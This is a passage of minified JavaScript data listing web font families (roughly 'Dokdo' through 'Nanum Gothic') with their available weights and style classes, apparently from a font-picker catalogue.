Dokdo",v:[400],f:"handwriting"},{n:"Eater",v:[400],f:"display"},{n:"Economica",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Eczar",v:[400,500,600,700,800],f:"serif"},{n:"El Messiri",v:[400,500,600,700],f:"sans-serif"},{n:"Electrolize",v:[400],f:"sans-serif"},{n:"Elsie",v:[400,900],f:"display"},{n:"Elsie Swash Caps",v:[400,900],f:"display"},{n:"Emblema One",v:[400],f:"display"},{n:"Emilys Candy",v:[400],f:"display"},{n:"Encode Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Expanded",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans SC",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Semi Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Semi Expanded",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Engagement",v:[400],f:"handwriting"},{n:"Englebert",v:[400],f:"sans-serif"},{n:"Enriqueta",v:[400,500,600,700],f:"serif"},{n:"Ephesis",v:[400],f:"handwriting"},{n:"Epilogue",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Erica One",v:[400],f:"display"},{n:"Esteban",v:[400],f:"serif"},{n:"Estonia",v:[400],f:"handwriting"},{n:"Euphoria Script",v:[400],f:"handwriting"},{n:"Ewert",v:[400],f:"display"},{n:"Exo",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Exo 2",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Expletus Sans",v:[400,500,600,700,"400i","500i","600i","700i"],f:"display"},{n:"Explora",v:[400],f:"handwriting"},{n:"Edu QLD Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu SA Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu TAS Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu VIC WA NT Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Fahkwang",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Familjen Grotesk",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Fanwood Text",v:[400,"400i"],f:"serif"},{n:"Farro",v:["300",400,500,700],f:"sans-serif"},{n:"Farsan",v:[400],f:"display"},{n:"Fascinate",v:[400],f:"display"},{n:"Fascinate Inline",v:[400],f:"display"},{n:"Faster One",v:[400],f:"display"},{n:"Fasthand",v:[400],f:"display"},{n:"Fauna One",v:[400],f:"serif"},{n:"Faustina",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Federant",v:[400],f:"display"},{n:"Federo",v:[400],f:"sans-serif"},{n:"Felipa",v:[400],f:"handwriting"},{n:"Fenix",v:[400],f:"serif"},{n:"Festive",v:[400],f:"handwriting"},{n:"Finger Paint",v:[400],f:"display"},{n:"Fira Code",v:["300",400,500,600,700],f:"monospace"},{n:"Fira Mono",v:[400,500,700],f:"monospace"},{n:"Fira Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fira Sans Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fira Sans Extra Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fjalla One",v:[400],f:"sans-serif"},{n:"Fjord One",v:[400],f:"serif"},{n:"Flamenco",v:["300",400],f:"display"},{n:"Flavors",v:[400],f:"display"},{n:"Fleur De Leah",v:[400],f:"handwriting"},{n:"Flow Block",v:[400],f:"display"},{n:"Flow Circular",v:[400],f:"display"},{n:"Flow Rounded",v:[400],f:"display"},{n:"Fondamento",v:[400,"400i"],f:"handwriting"},{n:"Fontdiner Swanky",v:[400],f:"display"},{n:"Forum",v:[400],f:"display"},{n:"Francois One",v:[400],f:"sans-serif"},{n:"Frank Ruhl Libre",v:["300",400,500,600,700,800,900],f:"serif"},{n:"Fraunces",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Freckle Face",v:[400],f:"display"},{n:"Fredericka the Great",v:[400],f:"display"},{n:"Fredoka",v:["300",400,500,600,700],f:"sans-serif"},{n:"Freehand",v:[400],f:"display"},{n:"Fresca",v:[400],f:"sans-serif"},{n:"Frijole",v:[400],f:"display"},{n:"Fruktur",v:[400,"400i"],f:"display"},{n:"Fugaz One",v:[400],f:"display"},{n:"Fuggles",v:[400],f:"handwriting"},{n:"Fuzzy Bubbles",v:[400,700],f:"handwriting"},{n:"Figtree",v:[300,400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Finlandica",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Foldit",v:[100,200,300,400,500,600,700,800,900],f:"display"},{n:"Fragment Mono",v:[400,"400i"],f:"monospace"},{n:"GFS Didot",v:[400],f:"serif"},{n:"GFS Neohellenic",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Gabriela",v:[400],f:"serif"},{n:"Gaegu",v:["300",400,700],f:"handwriting"},{n:"Gafata",v:[400],f:"sans-serif"},{n:"Galada",v:[400],f:"display"},{n:"Galdeano",v:[400],f:"sans-serif"},{n:"Galindo",v:[400],f:"display"},{n:"Gamja Flower",v:[400],f:"handwriting"},{n:"Gayathri",v:["100",400,700],f:"sans-serif"},{n:"Gelasio",v:[400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Gemunu Libre",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Genos",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Geo",v:[400,"400i"],f:"sans-serif"},{n:"Georama",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Geostar",v:[400],f:"display"},{n:"Geostar Fill",v:[400],f:"display"},{n:"Germania One",v:[400],f:"display"},{n:"Gideon Roman",v:[400],f:"display"},{n:"Gidugu",v:[400],f:"sans-serif"},{n:"Gilda Display",v:[400],f:"serif"},{n:"Girassol",v:[400],f:"display"},{n:"Give You Glory",v:[400],f:"handwriting"},{n:"Glass Antiqua",v:[400],f:"display"},{n:"Glegoo",v:[400,700],f:"serif"},{n:"Gloria Hallelujah",v:[400],f:"handwriting"},{n:"Glory",v:["100","200","300",400,500,600,700,800,"100i","200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Gluten",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Goblin One",v:[400],f:"display"},{n:"Gochi Hand",v:[400],f:"handwriting"},{n:"Goldman",v:[400,700],f:"display"},{n:"Gorditas",v:[400,700],f:"display"},{n:"Gothic A1",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Gotu",v:[400],f:"sans-serif"},{n:"Goudy Bookletter 1911",v:[400],f:"serif"},{n:"Gowun Batang",v:[400,700],f:"serif"},{n:"Gowun Dodum",v:[400],f:"sans-serif"},{n:"Graduate",v:[400],f:"display"},{n:"Grand Hotel",v:[400],f:"handwriting"},{n:"Grandstander",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Grape Nuts",v:[400],f:"handwriting"},{n:"Gravitas One",v:[400],f:"display"},{n:"Great Vibes",v:[400],f:"handwriting"},{n:"Grechen Fuemen",v:[400],f:"handwriting"},{n:"Grenze",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Grenze Gotisch",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Grey Qo",v:[400],f:"handwriting"},{n:"Griffy",v:[400],f:"display"},{n:"Gruppo",v:[400],f:"sans-serif"},{n:"Gudea",v:[400,"400i",700],f:"sans-serif"},{n:"Gugi",v:[400],f:"display"},{n:"Gupter",v:[400,500,700],f:"serif"},{n:"Gurajada",v:[400],f:"serif"},{n:"Gwendolyn",v:[400,700],f:"handwriting"},{n:"Gajraj One",v:[400],f:"display"},{n:"Gantari",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Gloock",v:[400],f:"serif"},{n:"Golos Text",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Gulzar",v:[400],f:"serif"},{n:"Gentium Book Plus",v:[400,"400i",700,"700i"],f:"serif"},{n:"Gentium Plus",v:[400,"400i",700,"700i"],f:"serif"},{n:"Habibi",v:[400],f:"serif"},{n:"Hachi Maru Pop",v:[400],f:"handwriting"},{n:"Hahmlet",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Halant",v:["300",400,500,600,700],f:"serif"},{n:"Hammersmith One",v:[400],f:"sans-serif"},{n:"Hanalei",v:[400],f:"display"},{n:"Hanalei Fill",v:[400],f:"display"},{n:"Handlee",v:[400],f:"handwriting"},{n:"Hanuman",v:["100","300",400,700,900],f:"serif"},{n:"Happy Monkey",v:[400],f:"display"},{n:"Harmattan",v:[400,500,600,700],f:"sans-serif"},{n:"Headland One",v:[400],f:"serif"},{n:"Heebo",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Henny Penny",v:[400],f:"display"},{n:"Hepta Slab",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Herr Von Muellerhoff",v:[400],f:"handwriting"},{n:"Hi Melody",v:[400],f:"handwriting"},{n:"Hina Mincho",v:[400],f:"serif"},{n:"Hind",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Guntur",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Madurai",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Siliguri",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Vadodara",v:["300",400,500,600,700],f:"sans-serif"},{n:"Holtwood One SC",v:[400],f:"serif"},{n:"Homemade Apple",v:[400],f:"handwriting"},{n:"Homenaje",v:[400],f:"sans-serif"},{n:"Hubballi",v:[400],f:"display"},{n:"Hurricane",v:[400],f:"handwriting"},{n:"Hanken Grotesk",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"IBM Plex Mono",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"monospace"},{n:"IBM Plex Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"IBM Plex Sans Arabic",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"IBM Plex Sans Devanagari",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Hebrew",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans KR",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Thai",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Thai Looped",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Serif",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"IM Fell DW Pica",v:[400,"400i"],f:"serif"},{n:"IM Fell DW Pica SC",v:[400],f:"serif"},{n:"IM Fell Double Pica",v:[400,"400i"],f:"serif"},{n:"IM Fell Double Pica SC",v:[400],f:"serif"},{n:"IM Fell English",v:[400,"400i"],f:"serif"},{n:"IM Fell English SC",v:[400],f:"serif"},{n:"IM Fell French Canon",v:[400,"400i"],f:"serif"},{n:"IM Fell French Canon SC",v:[400],f:"serif"},{n:"IM Fell Great Primer",v:[400,"400i"],f:"serif"},{n:"IM Fell Great Primer SC",v:[400],f:"serif"},{n:"Ibarra Real Nova",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Iceberg",v:[400],f:"display"},{n:"Iceland",v:[400],f:"display"},{n:"Imbue",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Imperial Script",v:[400],f:"handwriting"},{n:"Imprima",v:[400],f:"sans-serif"},{n:"Inconsolata",v:["200","300",400,500,600,700,800,900],f:"monospace"},{n:"Inder",v:[400],f:"sans-serif"},{n:"Indie Flower",v:[400],f:"handwriting"},{n:"Ingrid Darling",v:[400],f:"handwriting"},{n:"Inika",v:[400,700],f:"serif"},{n:"Inknut Antiqua",v:["300",400,500,600,700,800,900],f:"serif"},{n:"Inria Sans",v:["300","300i",400,"400i",700,"700i"],f:"sans-serif"},{n:"Inria Serif",v:["300","300i",400,"400i",700,"700i"],f:"serif"},{n:"Inspiration",v:[400],f:"handwriting"},{n:"Inter",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Irish Grover",v:[400],f:"display"},{n:"Island Moments",v:[400],f:"handwriting"},{n:"Istok Web",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Italiana",v:[400],f:"serif"},{n:"Italianno",v:[400],f:"handwriting"},{n:"Itim",v:[400],f:"handwriting"},{n:"IBM Plex Sans JP",v:[100,200,300,400,500,600,700],f:"sans-serif"},{n:"Instrument Sans",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Instrument Serif",v:[400,"400i"],f:"serif"},{n:"Inter Tight",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Jacques Francois",v:[400],f:"serif"},{n:"Jacques Francois Shadow",v:[400],f:"display"},{n:"Jaldi",v:[400,700],f:"sans-serif"},{n:"JetBrains Mono",v:["100","200","300",400,500,600,700,800,"100i","200i","300i","400i","500i","600i","700i","800i"],f:"monospace"},{n:"Jim Nightshade",v:[400],f:"handwriting"},{n:"Jockey One",v:[400],f:"sans-serif"},{n:"Jolly Lodger",v:[400],f:"display"},{n:"Jomhuria",v:[400],f:"display"},{n:"Jomolhari",v:[400],f:"serif"},{n:"Josefin Sans",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Josefin Slab",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"serif"},{n:"Jost",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Joti One",v:[400],f:"display"},{n:"Jua",v:[400],f:"sans-serif"},{n:"Judson",v:[400,"400i",700],f:"serif"},{n:"Julee",v:[400],f:"handwriting"},{n:"Julius Sans One",v:[400],f:"sans-serif"},{n:"Junge",v:[400],f:"serif"},{n:"Jura",v:["300",400,500,600,700],f:"sans-serif"},{n:"Just Another Hand",v:[400],f:"handwriting"},{n:"Just Me Again Down Here",v:[400],f:"handwriting"},{n:"K2D",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i"],f:"sans-serif"},{n:"Joan",v:[400],f:"serif"},{n:"Kadwa",v:[400,700],f:"serif"},{n:"Kaisei Decol",v:[400,500,700],f:"serif"},{n:"Kaisei HarunoUmi",v:[400,500,700],f:"serif"},{n:"Kaisei Opti",v:[400,500,700],f:"serif"},{n:"Kaisei Tokumin",v:[400,500,700,800],f:"serif"},{n:"Kalam",v:["300",400,700],f:"handwriting"},{n:"Kameron",v:[400,700],f:"serif"},{n:"Kanit",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Karantina",v:["300",400,700],f:"display"},{n:"Karla",v:["200","300",400,500,600,700,800,"200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Karma",v:["300",400,500,600,700],f:"serif"},{n:"Katibeh",v:[400],f:"display"},{n:"Kaushan Script",v:[400],f:"handwriting"},{n:"Kavivanar",v:[400],f:"handwriting"},{n:"Kavoon",v:[400],f:"display"},{n:"Keania One",v:[400],f:"display"},{n:"Kelly Slab",v:[400],f:"display"},{n:"Kenia",v:[400],f:"display"},{n:"Khand",v:["300",400,500,600,700],f:"sans-serif"},{n:"Khmer",v:[400],f:"display"},{n:"Khula",v:["300",400,600,700,800],f:"sans-serif"},{n:"Kings",v:[400],f:"handwriting"},{n:"Kirang Haerang",v:[400],f:"display"},{n:"Kite One",v:[400],f:"sans-serif"},{n:"Kiwi Maru",v:["300",400,500],f:"serif"},{n:"Klee One",v:[400,600],f:"handwriting"},{n:"Knewave",v:[400],f:"display"},{n:"KoHo",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kodchasan",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Koh Santepheap",v:["100","300",400,700,900],f:"display"},{n:"Kolker Brush",v:[400],f:"handwriting"},{n:"Kosugi",v:[400],f:"sans-serif"},{n:"Kosugi Maru",v:[400],f:"sans-serif"},{n:"Kotta One",v:[400],f:"serif"},{n:"Koulen",v:[400],f:"display"},{n:"Kranky",v:[400],f:"display"},{n:"Kreon",v:["300",400,500,600,700],f:"serif"},{n:"Kristi",v:[400],f:"handwriting"},{n:"Krona One",v:[400],f:"sans-serif"},{n:"Krub",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kufam",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Kulim Park",v:["200","200i","300","300i",400,"400i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Kumar One",v:[400],f:"display"},{n:"Kumar One Outline",v:[400],f:"display"},{n:"Kumbh Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Kurale",v:[400],f:"serif"},{n:"Kantumruy Pro",v:[100,200,300,400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Kdam Thmor Pro",v:[400],f:"sans-serif"},{n:"Konkhmer Sleokchher",v:[400],f:"display"},{n:"La Belle Aurore",v:[400],f:"handwriting"},{n:"Lacquer",v:[400],f:"display"},{n:"Laila",v:["300",400,500,600,700],f:"sans-serif"},{n:"Lakki Reddy",v:[400],f:"handwriting"},{n:"Lalezar",v:[400],f:"display"},{n:"Lancelot",v:[400],f:"display"},{n:"Langar",v:[400],f:"display"},{n:"Lateef",v:[200,300,400,500,600,700,800],f:"handwriting"},{n:"Lato",v:["100","100i","300","300i",400,"400i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Lavishly Yours",v:[400],f:"handwriting"},{n:"League Gothic",v:[400],f:"sans-serif"},{n:"League Script",v:[400],f:"handwriting"},{n:"League Spartan",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Leckerli One",v:[400],f:"handwriting"},{n:"Ledger",v:[400],f:"serif"},{n:"Lekton",v:[400,"400i",700],f:"sans-serif"},{n:"Lemon",v:[400],f:"display"},{n:"Lemonada",v:["300",400,500,600,700],f:"display"},{n:"Lexend",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Deca",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Exa",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Giga",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Mega",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Peta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Tera",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Lexend Zetta",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Libre Barcode 128",v:[400],f:"display"},{n:"Libre Barcode 128 Text",v:[400],f:"display"},{n:"Libre Barcode 39",v:[400],f:"display"},{n:"Libre Barcode 39 Extended",v:[400],f:"display"},{n:"Libre Barcode 39 Extended Text",v:[400],f:"display"},{n:"Libre Barcode 39 Text",v:[400],f:"display"},{n:"Libre Barcode EAN13 Text",v:[400],f:"display"},{n:"Libre Baskerville",v:[400,"400i",700],f:"serif"},{n:"Libre Bodoni",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Libre Caslon Display",v:[400],f:"serif"},{n:"Libre Caslon Text",v:[400,"400i",700],f:"serif"},{n:"Libre Franklin",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Licorice",v:[400],f:"handwriting"},{n:"Life Savers",v:[400,700,800],f:"display"},{n:"Lilita One",v:[400],f:"display"},{n:"Lily Script One",v:[400],f:"display"},{n:"Limelight",v:[400],f:"display"},{n:"Linden Hill",v:[400,"400i"],f:"serif"},{n:"Literata",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Liu Jian Mao Cao",v:[400],f:"handwriting"},{n:"Livvic",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",900,"900i"],f:"sans-serif"},{n:"Lobster",v:[400],f:"display"},{n:"Lobster Two",v:[400,"400i",700,"700i"],f:"display"},{n:"Londrina Outline",v:[400],f:"display"},{n:"Londrina Shadow",v:[400],f:"display"},{n:"Londrina Sketch",v:[400],f:"display"},{n:"Londrina Solid",v:["100","300",400,900],f:"display"},{n:"Long Cang",v:[400],f:"handwriting"},{n:"Lora",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Love Light",v:[400],f:"handwriting"},{n:"Love Ya Like A Sister",v:[400],f:"display"},{n:"Loved by the King",v:[400],f:"handwriting"},{n:"Lovers Quarrel",v:[400],f:"handwriting"},{n:"Luckiest Guy",v:[400],f:"display"},{n:"Lusitana",v:[400,700],f:"serif"},{n:"Lustria",v:[400],f:"serif"},{n:"Luxurious Roman",v:[400],f:"display"},{n:"Luxurious Script",v:[400],f:"handwriting"},{n:"Labrada",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"M PLUS 1",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"M PLUS 1 Code",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"M PLUS 1p",v:["100","300",400,500,700,800,900],f:"sans-serif"},{n:"M PLUS 2",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"M PLUS Code Latin",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"M PLUS Rounded 1c",v:["100","300",400,500,700,800,900],f:"sans-serif"},{n:"Ma Shan Zheng",v:[400],f:"handwriting"},{n:"Macondo",v:[400],f:"display"},{n:"Macondo Swash Caps",v:[400],f:"display"},{n:"Mada",v:["200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Magra",v:[400,700],f:"sans-serif"},{n:"Maiden Orange",v:[400],f:"display"},{n:"Maitree",v:["200","300",400,500,600,700],f:"serif"},{n:"Major Mono Display",v:[400],f:"monospace"},{n:"Mako",v:[400],f:"sans-serif"},{n:"Mali",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"handwriting"},{n:"Mallanna",v:[400],f:"sans-serif"},{n:"Mandali",v:[400],f:"sans-serif"},{n:"Manjari",v:["100",400,700],f:"sans-serif"},{n:"Manrope",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mansalva",v:[400],f:"handwriting"},{n:"Manuale",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Marcellus",v:[400],f:"serif"},{n:"Marcellus SC",v:[400],f:"serif"},{n:"Marck Script",v:[400],f:"handwriting"},{n:"Margarine",v:[400],f:"display"},{n:"Markazi Text",v:[400,500,600,700],f:"serif"},{n:"Marko One",v:[400],f:"serif"},{n:"Marmelad",v:[400],f:"sans-serif"},{n:"Martel",v:["200","300",400,600,700,800,900],f:"serif"},{n:"Martel Sans",v:["200","300",400,600,700,800,900],f:"sans-serif"},{n:"Marvel",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Mate",v:[400,"400i"],f:"serif"},{n:"Mate SC",v:[400],f:"serif"},{n:"Maven Pro",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"McLaren",v:[400],f:"display"},{n:"Mea Culpa",v:[400],f:"handwriting"},{n:"Meddon",v:[400],f:"handwriting"},{n:"MedievalSharp",v:[400],f:"display"},{n:"Medula One",v:[400],f:"display"},{n:"Meera Inimai",v:[400],f:"sans-serif"},{n:"Megrim",v:[400],f:"display"},{n:"Meie Script",v:[400],f:"handwriting"},{n:"Meow Script",v:[400],f:"handwriting"},{n:"Merienda",v:[300,400,500,600,700,800,900],f:"handwriting"},{n:"Merriweather",v:["300","300i",400,"400i",700,"700i",900,"900i"],f:"serif"},{n:"Merriweather Sans",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Metal",v:[400],f:"display"},{n:"Metal Mania",v:[400],f:"display"},{n:"Metamorphous",v:[400],f:"display"},{n:"Metrophobic",v:[400],f:"sans-serif"},{n:"Michroma",v:[400],f:"sans-serif"},{n:"Milonga",v:[400],f:"display"},{n:"Miltonian",v:[400],f:"display"},{n:"Miltonian Tattoo",v:[400],f:"display"},{n:"Mina",v:[400,700],f:"sans-serif"},{n:"Miniver",v:[400],f:"display"},{n:"Miriam Libre",v:[400,700],f:"sans-serif"},{n:"Mirza",v:[400,500,600,700],f:"display"},{n:"Miss Fajardose",v:[400],f:"handwriting"},{n:"Mitr",v:["200","300",400,500,600,700],f:"sans-serif"},{n:"Mochiy Pop One",v:[400],f:"sans-serif"},{n:"Mochiy Pop P One",v:[400],f:"sans-serif"},{n:"Modak",v:[400],f:"display"},{n:"Modern Antiqua",v:[400],f:"display"},{n:"Mogra",v:[400],f:"display"},{n:"Mohave",v:["300",400,500,600,700,"300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Molengo",v:[400],f:"sans-serif"},{n:"Molle",v:["400i"],f:"handwriting"},{n:"Monda",v:[400,700],f:"sans-serif"},{n:"Monofett",v:[400],f:"monospace"},{n:"Monoton",v:[400],f:"display"},{n:"Monsieur La Doulaise",v:[400],f:"handwriting"},{n:"Montaga",v:[400],f:"serif"},{n:"Montagu Slab",v:["100","200","300",400,500,600,700],f:"serif"},{n:"MonteCarlo",v:[400],f:"handwriting"},{n:"Montez",v:[400],f:"handwriting"},{n:"Montserrat",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Montserrat Alternates",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Montserrat Subrayada",v:[400,700],f:"sans-serif"},{n:"Moo Lah Lah",v:[400],f:"display"},{n:"Moon Dance",v:[400],f:"handwriting"},{n:"Moul",v:[400],f:"display"},{n:"Moulpali",v:[400],f:"display"},{n:"Mountains of Christmas",v:[400,700],f:"display"},{n:"Mouse Memoirs",v:[400],f:"sans-serif"},{n:"Mr Bedfort",v:[400],f:"handwriting"},{n:"Mr Dafoe",v:[400],f:"handwriting"},{n:"Mr De Haviland",v:[400],f:"handwriting"},{n:"Mrs Saint Delafield",v:[400],f:"handwriting"},{n:"Mrs Sheppards",v:[400],f:"handwriting"},{n:"Ms Madi",v:[400],f:"handwriting"},{n:"Mukta",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Mahee",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Malar",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mukta Vaani",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Mulish",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Murecho",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"MuseoModerno",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"My Soul",v:[400],f:"handwriting"},{n:"Mystery Quest",v:[400],f:"display"},{n:"Marhey",v:[300,400,500,600,700],f:"display"},{n:"Martian Mono",v:[100,200,300,400,500,600,700,800],f:"monospace"},{n:"Material Icons",v:[400],f:"monospace"},{n:"Material Icons Outlined",v:[400],f:"monospace"},{n:"Material Icons Round",v:[400],f:"monospace"},{n:"Material Icons Sharp",v:[400],f:"monospace"},{n:"Material Icons Two Tone",v:[400],f:"monospace"},{n:"Material Symbols Outlined",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Material Symbols Rounded",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Material Symbols Sharp",v:[100,200,300,400,500,600,700],f:"monospace"},{n:"Mingzat",v:[400],f:"sans-serif"},{n:"Monomaniac One",v:[400],f:"sans-serif"},{n:"Mynerve",v:[400],f:"handwriting"},{n:"NTR",v:[400],f:"sans-serif"},{n:"Nanum Brush Script",v:[400],f:"handwriting"},{n:"Nanum Gothic",v:[400,700,800],f:"sans-serif"},{n:"Nanum Gothic 